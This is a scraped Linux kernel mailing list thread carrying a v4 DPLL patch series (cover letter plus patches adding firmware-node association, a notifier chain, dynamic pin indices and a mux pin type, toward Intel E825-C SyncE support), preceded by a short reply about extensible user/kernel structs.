My initial thought is, as said, like many user/kernel structures: both sides agree on the basic order of the struct and pass along the length, so that they agree to only process the min of both their supported lengths. New fields are added at the tail of the struct. See for instance getsockopt TCP_INFO.
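The scheme described above, where new fields are only appended at the tail and each side processes min(its supported length, the peer's length), can be sketched in plain C. Struct and field names below are hypothetical, not from the virtio spec; only the copying discipline is the point, mirroring what getsockopt TCP_INFO does for userspace.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical v1 metadata record. */
struct rx_meta_v1 {
	uint32_t tstamp_sec;
	uint32_t tstamp_nsec;
};

/* Hypothetical v2: fields are only ever appended at the tail. */
struct rx_meta_v2 {
	uint32_t tstamp_sec;
	uint32_t tstamp_nsec;
	uint32_t flow_hash;	/* appended in v2 */
	uint32_t reserved;
};

/* Copy up to dst_len bytes of metadata; report how much was produced.
 * Each side only consumes the common prefix both of them understand. */
static size_t meta_copy(void *dst, size_t dst_len,
			const void *src, size_t src_len)
{
	size_t n = dst_len < src_len ? dst_len : src_len;

	memcpy(dst, src, n);
	return n;
}
```

A v1 consumer handed a v2 record simply receives the v1 prefix and ignores the rest; a v2 consumer handed a v1 record sees a returned length shorter than its struct and treats the missing tail fields as absent.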
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Mon, 02 Feb 2026 12:40:36 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller.

Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability.

DPLL Core Extensions:
* Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes.
* Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies.
* Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index.

Reference Counting & Debugging:
* Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths.
* Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation.

Driver Updates:
* zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type.
* ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs.
Patch Summary:
Patch 1: DPLL Core (fwnode association).
Patch 2: Driver zl3073x (Set fwnode).
Patch 3-4: DPLL Core (Notifiers and dynamic IDs).
Patch 5: Driver zl3073x (Mux type).
Patch 6: DPLL Core (Refcount refactor).
Patch 7-8: Refcount tracking infrastructure and driver updates.
Patch 9: Driver ice (E825-C SyncE logic).

Changes in v4:
* Fixed documentation and function stub issues found by AI

Arkadiusz Kubalewski (1):
  ice: dpll: Support E825-C SyncE and dynamic pin discovery

Ivan Vecera (7):
  dpll: Allow associating dpll pin with a firmware node
  dpll: zl3073x: Associate pin with fwnode handle
  dpll: Support dynamic pin index allocation
  dpll: zl3073x: Add support for mux pin type
  dpll: Enhance and consolidate reference counting logic
  dpll: Add reference count tracking support
  drivers: Add support for DPLL reference count tracking

Petr Oros (1):
  dpll: Add notifier chain for dpll events

 drivers/dpll/Kconfig                        |  15 +
 drivers/dpll/dpll_core.c                    | 288 ++++++-
 drivers/dpll/dpll_core.h                    |  11 +
 drivers/dpll/dpll_netlink.c                 |   6 +
 drivers/dpll/zl3073x/dpll.c                 |  15 +-
 drivers/dpll/zl3073x/dpll.h                 |   2 +
 drivers/dpll/zl3073x/prop.c                 |   2 +
 drivers/net/ethernet/intel/ice/ice_dpll.c   | 755 +++++++++++++++---
 drivers/net/ethernet/intel/ice/ice_dpll.h   |  30 +
 drivers/net/ethernet/intel/ice/ice_lib.c    |   3 +
 drivers/net/ethernet/intel/ice/ice_ptp.c    |  32 +
 drivers/net/ethernet/intel/ice/ice_ptp_hw.c |   9 +-
 drivers/net/ethernet/intel/ice/ice_tspll.c  | 217 +++++
 drivers/net/ethernet/intel/ice/ice_tspll.h  |  13 +-
 drivers/net/ethernet/intel/ice/ice_type.h   |   6 +
 .../net/ethernet/mellanox/mlx5/core/dpll.c  |  16 +-
 drivers/ptp/ptp_ocp.c                       |  18 +-
 include/linux/dpll.h                        |  59 +-
 18 files changed, 1347 insertions(+), 150 deletions(-)

-- 
2.52.0
Extend the DPLL core to support associating a DPLL pin with a firmware node. This association is required to allow other subsystems (such as network drivers) to locate and request specific DPLL pins defined in the Device Tree or ACPI.

* Add a .fwnode field to the struct dpll_pin
* Introduce dpll_pin_fwnode_set() helper to allow the provider driver to associate a pin with a fwnode after the pin has been allocated
* Introduce fwnode_dpll_pin_find() helper to allow consumers to search for a registered DPLL pin using its associated fwnode handle
* Ensure the fwnode reference is properly released in dpll_pin_put()

Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev>
Signed-off-by: Ivan Vecera <ivecera@redhat.com>
---
v4:
* fixed fwnode_dpll_pin_find() return value description
---
 drivers/dpll/dpll_core.c | 49 ++++++++++++++++++++++++++++++++++++++++
 drivers/dpll/dpll_core.h |  2 ++
 include/linux/dpll.h     | 11 +++++++++
 3 files changed, 62 insertions(+)

diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c
index 8879a72351561..f04ed7195cadd 100644
--- a/drivers/dpll/dpll_core.c
+++ b/drivers/dpll/dpll_core.c
@@ -10,6 +10,7 @@
 #include <linux/device.h>
 #include <linux/err.h>
+#include <linux/property.h>
 #include <linux/slab.h>
 #include <linux/string.h>
@@ -595,12 +596,60 @@ void dpll_pin_put(struct dpll_pin *pin)
 		xa_destroy(&pin->parent_refs);
 		xa_destroy(&pin->ref_sync_pins);
 		dpll_pin_prop_free(&pin->prop);
+		fwnode_handle_put(pin->fwnode);
 		kfree_rcu(pin, rcu);
 	}
 	mutex_unlock(&dpll_lock);
 }
 EXPORT_SYMBOL_GPL(dpll_pin_put);
 
+/**
+ * dpll_pin_fwnode_set - set dpll pin firmware node reference
+ * @pin: pointer to a dpll pin
+ * @fwnode: firmware node handle
+ *
+ * Set firmware node handle for the given dpll pin.
+ */
+void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode)
+{
+	mutex_lock(&dpll_lock);
+	fwnode_handle_put(pin->fwnode); /* Drop fwnode previously set */
+	pin->fwnode = fwnode_handle_get(fwnode);
+	mutex_unlock(&dpll_lock);
+}
+EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set);
+
+/**
+ * fwnode_dpll_pin_find - find dpll pin by firmware node reference
+ * @fwnode: reference to firmware node
+ *
+ * Get existing object of a pin that is associated with given firmware node
+ * reference.
+ *
+ * Context: Acquires a lock (dpll_lock)
+ * Return:
+ * * valid dpll_pin pointer on success
+ * * NULL when no such pin exists
+ */
+struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode)
+{
+	struct dpll_pin *pin, *ret = NULL;
+	unsigned long index;
+
+	mutex_lock(&dpll_lock);
+	xa_for_each(&dpll_pin_xa, index, pin) {
+		if (pin->fwnode == fwnode) {
+			ret = pin;
+			refcount_inc(&ret->refcount);
+			break;
+		}
+	}
+	mutex_unlock(&dpll_lock);
+
+	return ret;
+}
+EXPORT_SYMBOL_GPL(fwnode_dpll_pin_find);
+
 static int __dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin,
			       const struct dpll_pin_ops *ops, void *priv,
			       void *cookie)
diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h
index 8ce969bbeb64e..d3e17ff0ecef0 100644
--- a/drivers/dpll/dpll_core.h
+++ b/drivers/dpll/dpll_core.h
@@ -42,6 +42,7 @@ struct dpll_device {
  * @pin_idx: index of a pin given by dev driver
  * @clock_id: clock_id of creator
  * @module: module of creator
+ * @fwnode: optional reference to firmware node
  * @dpll_refs: hold referencees to dplls pin was registered with
  * @parent_refs: hold references to parent pins pin was registered with
  * @ref_sync_pins: hold references to pins for Reference SYNC feature
@@ -54,6 +55,7 @@ struct dpll_pin {
 	u32 pin_idx;
 	u64 clock_id;
 	struct module *module;
+	struct fwnode_handle *fwnode;
 	struct xarray dpll_refs;
 	struct xarray parent_refs;
 	struct xarray ref_sync_pins;
diff --git a/include/linux/dpll.h b/include/linux/dpll.h
index c6d0248fa5273..f2e8660e90cdf 100644
--- a/include/linux/dpll.h
+++ b/include/linux/dpll.h
@@ -16,6 +16,7 @@
 struct dpll_device;
 struct dpll_pin;
 struct dpll_pin_esync;
+struct fwnode_handle;
 
 struct dpll_device_ops {
 	int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv,
@@ -178,6 +179,8 @@ void dpll_netdev_pin_clear(struct net_device *dev);
 size_t dpll_netdev_pin_handle_size(const struct net_device *dev);
 int dpll_netdev_add_pin_handle(struct sk_buff *msg,
			       const struct net_device *dev);
+
+struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode);
 #else
 static inline void dpll_netdev_pin_set(struct net_device *dev,
				       struct dpll_pin *dpll_pin) { }
@@ -193,6 +196,12 @@
 dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev)
 {
 	return 0;
 }
+
+static inline struct dpll_pin *
+fwnode_dpll_pin_find(struct fwnode_handle *fwnode)
+{
+	return NULL;
+}
 #endif
 
 struct dpll_device *
@@ -218,6 +227,8 @@ void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin,
 void dpll_pin_put(struct dpll_pin *pin);
 
+void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode);
+
 int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin,
			     const struct dpll_pin_ops *ops, void *priv);
-- 
2.52.0
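For reference, a consumer of the two new helpers might look roughly like the kernel-side sketch below. It is not compiled here; the "dplls" property name and the surrounding driver function are invented for illustration, while fwnode_find_reference(), fwnode_dpll_pin_find() and dpll_pin_put() come from the kernel property API and this patch.

```c
#include <linux/dpll.h>
#include <linux/property.h>

static int example_attach_dpll_pin(struct device *dev)
{
	struct fwnode_handle *fwnode;
	struct dpll_pin *pin;

	/* "dplls" is a made-up property name for this sketch */
	fwnode = fwnode_find_reference(dev_fwnode(dev), "dplls", 0);
	if (IS_ERR(fwnode))
		return PTR_ERR(fwnode);

	pin = fwnode_dpll_pin_find(fwnode);	/* takes a reference on success */
	fwnode_handle_put(fwnode);
	if (!pin)
		return -EPROBE_DEFER;	/* provider may not have registered yet */

	/* ... use the pin, e.g. register pin ops against it ... */

	dpll_pin_put(pin);	/* drop the reference taken by _find() */
	return 0;
}
```

Note that the NULL return doubles as "provider not probed yet", which is why the series also adds a notifier chain so consumers need not rely solely on probe deferral.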
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:30 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
Associate the registered DPLL pin with its firmware node by calling dpll_pin_fwnode_set(). This links the created pin object to its corresponding DT/ACPI node in the DPLL core. Consequently, this enables consumer drivers (such as network drivers) to locate and request this specific pin using the fwnode_dpll_pin_find() helper.

Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
Signed-off-by: Ivan Vecera <ivecera@redhat.com>
---
 drivers/dpll/zl3073x/dpll.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c
index 7d8ed948b9706..9eed21088adac 100644
--- a/drivers/dpll/zl3073x/dpll.c
+++ b/drivers/dpll/zl3073x/dpll.c
@@ -1485,6 +1485,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index)
 		rc = PTR_ERR(pin->dpll_pin);
 		goto err_pin_get;
 	}
+	dpll_pin_fwnode_set(pin->dpll_pin, props->fwnode);
 
 	if (zl3073x_dpll_is_input_pin(pin))
 		ops = &zl3073x_dpll_input_pin_ops;
-- 
2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:31 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
From: Petr Oros <poros@redhat.com>

Currently, the DPLL subsystem reports events (creation, deletion, changes) to userspace via Netlink. However, there is no mechanism for other kernel components to be notified of these events directly.

Add a raw notifier chain to the DPLL core protected by dpll_lock. This allows other kernel subsystems or drivers to register callbacks and receive notifications when DPLL devices or pins are created, deleted, or modified.

Define the following:
- Registration helpers: {,un}register_dpll_notifier()
- Event types: DPLL_DEVICE_CREATED, DPLL_PIN_CREATED, etc.
- Context structures: dpll_{device,pin}_notifier_info to pass relevant data to the listeners.

The notification chain is invoked alongside the existing Netlink event generation to ensure in-kernel listeners are kept in sync with the subsystem state.

Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev>
Co-developed-by: Ivan Vecera <ivecera@redhat.com>
Signed-off-by: Ivan Vecera <ivecera@redhat.com>
Signed-off-by: Petr Oros <poros@redhat.com>
---
 drivers/dpll/dpll_core.c    | 57 +++++++++++++++++++++++++++++++++++++
 drivers/dpll/dpll_core.h    |  4 +++
 drivers/dpll/dpll_netlink.c |  6 ++++
 include/linux/dpll.h        | 29 +++++++++++++++++++
 4 files changed, 96 insertions(+)

diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c
index f04ed7195cadd..b05fe2ba46d91 100644
--- a/drivers/dpll/dpll_core.c
+++ b/drivers/dpll/dpll_core.c
@@ -23,6 +23,8 @@
 DEFINE_MUTEX(dpll_lock);
 DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC);
 DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC);
 
+static RAW_NOTIFIER_HEAD(dpll_notifier_chain);
+
 static u32 dpll_device_xa_id;
 static u32 dpll_pin_xa_id;
@@ -46,6 +48,39 @@ struct dpll_pin_registration {
 	void *cookie;
 };
 
+static int call_dpll_notifiers(unsigned long action, void *info)
+{
+	lockdep_assert_held(&dpll_lock);
+	return raw_notifier_call_chain(&dpll_notifier_chain, action, info);
+}
+
+void dpll_device_notify(struct dpll_device *dpll, unsigned long action)
+{
+	struct dpll_device_notifier_info info = {
+		.dpll = dpll,
+		.id = dpll->id,
+		.idx = dpll->device_idx,
+		.clock_id = dpll->clock_id,
+		.type = dpll->type,
+	};
+
+	call_dpll_notifiers(action, &info);
+}
+
+void dpll_pin_notify(struct dpll_pin *pin, unsigned long action)
+{
+	struct dpll_pin_notifier_info info = {
+		.pin = pin,
+		.id = pin->id,
+		.idx = pin->pin_idx,
+		.clock_id = pin->clock_id,
+		.fwnode = pin->fwnode,
+		.prop = &pin->prop,
+	};
+
+	call_dpll_notifiers(action, &info);
+}
+
 struct dpll_device *dpll_device_get_by_id(int id)
 {
 	if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED))
@@ -539,6 +574,28 @@ void dpll_netdev_pin_clear(struct net_device *dev)
 }
 EXPORT_SYMBOL(dpll_netdev_pin_clear);
 
+int register_dpll_notifier(struct notifier_block *nb)
+{
+	int ret;
+
+	mutex_lock(&dpll_lock);
+	ret = raw_notifier_chain_register(&dpll_notifier_chain, nb);
+	mutex_unlock(&dpll_lock);
+	return ret;
+}
+EXPORT_SYMBOL_GPL(register_dpll_notifier);
+
+int unregister_dpll_notifier(struct notifier_block *nb)
+{
+	int ret;
+
+	mutex_lock(&dpll_lock);
+	ret = raw_notifier_chain_unregister(&dpll_notifier_chain, nb);
+	mutex_unlock(&dpll_lock);
+	return ret;
+}
+EXPORT_SYMBOL_GPL(unregister_dpll_notifier);
+
 /**
  * dpll_pin_get - find existing or create new dpll pin
  * @clock_id: clock_id of creator
diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h
index d3e17ff0ecef0..b7b4bb251f739 100644
--- a/drivers/dpll/dpll_core.h
+++ b/drivers/dpll/dpll_core.h
@@ -91,4 +91,8 @@
 struct dpll_pin_ref *dpll_xa_ref_dpll_first(struct xarray *xa_refs);
 extern struct xarray dpll_device_xa;
 extern struct xarray dpll_pin_xa;
 extern struct mutex dpll_lock;
+
+void dpll_device_notify(struct dpll_device *dpll, unsigned long action);
+void dpll_pin_notify(struct dpll_pin *pin, unsigned long action);
+
 #endif
diff --git a/drivers/dpll/dpll_netlink.c b/drivers/dpll/dpll_netlink.c
index 904199ddd1781..83cbd64abf5a4 100644
--- a/drivers/dpll/dpll_netlink.c
+++ b/drivers/dpll/dpll_netlink.c
@@ -761,17 +761,20 @@ dpll_device_event_send(enum dpll_cmd event, struct dpll_device *dpll)
 
 int dpll_device_create_ntf(struct dpll_device *dpll)
 {
+	dpll_device_notify(dpll, DPLL_DEVICE_CREATED);
 	return dpll_device_event_send(DPLL_CMD_DEVICE_CREATE_NTF, dpll);
 }
 
 int dpll_device_delete_ntf(struct dpll_device *dpll)
 {
+	dpll_device_notify(dpll, DPLL_DEVICE_DELETED);
 	return dpll_device_event_send(DPLL_CMD_DEVICE_DELETE_NTF, dpll);
 }
 
 static int
 __dpll_device_change_ntf(struct dpll_device *dpll)
 {
+	dpll_device_notify(dpll, DPLL_DEVICE_CHANGED);
 	return dpll_device_event_send(DPLL_CMD_DEVICE_CHANGE_NTF, dpll);
 }
@@ -829,16 +832,19 @@ dpll_pin_event_send(enum dpll_cmd event, struct dpll_pin *pin)
 
 int dpll_pin_create_ntf(struct dpll_pin *pin)
 {
+	dpll_pin_notify(pin, DPLL_PIN_CREATED);
 	return dpll_pin_event_send(DPLL_CMD_PIN_CREATE_NTF, pin);
 }
 
 int dpll_pin_delete_ntf(struct dpll_pin *pin)
 {
+	dpll_pin_notify(pin, DPLL_PIN_DELETED);
 	return dpll_pin_event_send(DPLL_CMD_PIN_DELETE_NTF, pin);
 }
 
 int __dpll_pin_change_ntf(struct dpll_pin *pin)
 {
+	dpll_pin_notify(pin, DPLL_PIN_CHANGED);
 	return dpll_pin_event_send(DPLL_CMD_PIN_CHANGE_NTF, pin);
 }
diff --git a/include/linux/dpll.h b/include/linux/dpll.h
index f2e8660e90cdf..8ed90dfc65f05 100644
--- a/include/linux/dpll.h
+++ b/include/linux/dpll.h
@@ -11,6 +11,7 @@
 #include <linux/device.h>
 #include <linux/netlink.h>
 #include <linux/netdevice.h>
+#include <linux/notifier.h>
 #include <linux/rtnetlink.h>
 
 struct dpll_device;
@@ -172,6 +173,30 @@ struct dpll_pin_properties {
 	u32 phase_gran;
 };
 
+#define DPLL_DEVICE_CREATED	1
+#define DPLL_DEVICE_DELETED	2
+#define DPLL_DEVICE_CHANGED	3
+#define DPLL_PIN_CREATED	4
+#define DPLL_PIN_DELETED	5
+#define DPLL_PIN_CHANGED	6
+
+struct dpll_device_notifier_info {
+	struct dpll_device *dpll;
+	u32 id;
+	u32 idx;
+	u64 clock_id;
+	enum dpll_type type;
+};
+
+struct dpll_pin_notifier_info {
+	struct dpll_pin *pin;
+	u32 id;
+	u32 idx;
+	u64 clock_id;
+	const struct
fwnode_handle *fwnode; + const struct dpll_pin_properties *prop; +}; + #if IS_ENABLED(CONFIG_DPLL) void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin); void dpll_netdev_pin_clear(struct net_device *dev); @@ -242,4 +267,8 @@ int dpll_device_change_ntf(struct dpll_device *dpll); int dpll_pin_change_ntf(struct dpll_pin *pin); +int register_dpll_notifier(struct notifier_block *nb); + +int unregister_dpll_notifier(struct notifier_block *nb); + #endif -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:32 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. 
Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Allow drivers to register DPLL pins without manually specifying a pin index. Currently, drivers must provide a unique pin index when calling dpll_pin_get(). This works well for hardware-mapped pins but creates friction for drivers handling virtual pins or those without a strict hardware indexing scheme. Introduce DPLL_PIN_IDX_UNSPEC (U32_MAX). When a driver passes this value as the pin index: 1. The core allocates a unique index using an IDA 2. The allocated index is mapped to a range starting above `INT_MAX` This separation ensures that dynamically allocated indices never collide with standard driver-provided hardware indices, which are assumed to be within the `0` to `INT_MAX` range. The index is automatically freed when the pin is released in dpll_pin_put(). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v2: * fixed integer overflow in dpll_pin_idx_free() --- drivers/dpll/dpll_core.c | 48 ++++++++++++++++++++++++++++++++++++++-- include/linux/dpll.h | 2 ++ 2 files changed, 48 insertions(+), 2 deletions(-) diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index b05fe2ba46d91..59081cf2c73ae 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -10,6 +10,7 @@ #include <linux/device.h> #include <linux/err.h> +#include <linux/idr.h> #include <linux/property.h> #include <linux/slab.h> #include <linux/string.h> @@ -24,6 +25,7 @@ DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC); DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC); static RAW_NOTIFIER_HEAD(dpll_notifier_chain); +static DEFINE_IDA(dpll_pin_idx_ida); static u32 dpll_device_xa_id; static u32 dpll_pin_xa_id; @@ -464,6 +466,36 @@ void dpll_device_unregister(struct dpll_device *dpll, } EXPORT_SYMBOL_GPL(dpll_device_unregister); +static int dpll_pin_idx_alloc(u32 *pin_idx) +{ + int ret; + + if (!pin_idx) + return -EINVAL; + + /* Alloc unique number from IDA. 
Number belongs to <0, INT_MAX> range */ + ret = ida_alloc(&dpll_pin_idx_ida, GFP_KERNEL); + if (ret < 0) + return ret; + + /* Map the value to dynamic pin index range <INT_MAX+1, U32_MAX> */ + *pin_idx = (u32)ret + INT_MAX + 1; + + return 0; +} + +static void dpll_pin_idx_free(u32 pin_idx) +{ + if (pin_idx <= INT_MAX) + return; /* Not a dynamic pin index */ + + /* Map the index value from dynamic pin index range to IDA range and + * free it. + */ + pin_idx -= (u32)INT_MAX + 1; + ida_free(&dpll_pin_idx_ida, pin_idx); +} + static void dpll_pin_prop_free(struct dpll_pin_properties *prop) { kfree(prop->package_label); @@ -521,9 +553,18 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, struct dpll_pin *pin; int ret; + if (pin_idx == DPLL_PIN_IDX_UNSPEC) { + ret = dpll_pin_idx_alloc(&pin_idx); + if (ret) + return ERR_PTR(ret); + } else if (pin_idx > INT_MAX) { + return ERR_PTR(-EINVAL); + } pin = kzalloc(sizeof(*pin), GFP_KERNEL); - if (!pin) - return ERR_PTR(-ENOMEM); + if (!pin) { + ret = -ENOMEM; + goto err_pin_alloc; + } pin->pin_idx = pin_idx; pin->clock_id = clock_id; pin->module = module; @@ -551,6 +592,8 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, dpll_pin_prop_free(&pin->prop); err_pin_prop: kfree(pin); +err_pin_alloc: + dpll_pin_idx_free(pin_idx); return ERR_PTR(ret); } @@ -654,6 +697,7 @@ void dpll_pin_put(struct dpll_pin *pin) xa_destroy(&pin->ref_sync_pins); dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); + dpll_pin_idx_free(pin->pin_idx); kfree_rcu(pin, rcu); } mutex_unlock(&dpll_lock); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8ed90dfc65f05..8fff048131f1d 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -240,6 +240,8 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, void dpll_device_unregister(struct dpll_device *dpll, const struct dpll_device_ops *ops, void *priv); +#define DPLL_PIN_IDX_UNSPEC U32_MAX + struct dpll_pin * dpll_pin_get(u64 
clock_id, u32 dev_driver_id, struct module *module, const struct dpll_pin_properties *prop); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:33 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
Add parsing for the "mux" string in the 'connection-type' pin property mapping it to DPLL_PIN_TYPE_MUX. Recognizing this type in the driver allows these pins to be taken as parent pins for pin-on-pin pins coming from different modules (e.g. network drivers). Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/prop.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/dpll/zl3073x/prop.c b/drivers/dpll/zl3073x/prop.c index 4ed153087570b..ad1f099cbe2b5 100644 --- a/drivers/dpll/zl3073x/prop.c +++ b/drivers/dpll/zl3073x/prop.c @@ -249,6 +249,8 @@ struct zl3073x_pin_props *zl3073x_pin_props_get(struct zl3073x_dev *zldev, props->dpll_props.type = DPLL_PIN_TYPE_INT_OSCILLATOR; else if (!strcmp(type, "synce")) props->dpll_props.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + else if (!strcmp(type, "mux")) + props->dpll_props.type = DPLL_PIN_TYPE_MUX; else dev_warn(zldev->dev, "Unknown or unsupported pin type '%s'\n", -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:34 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
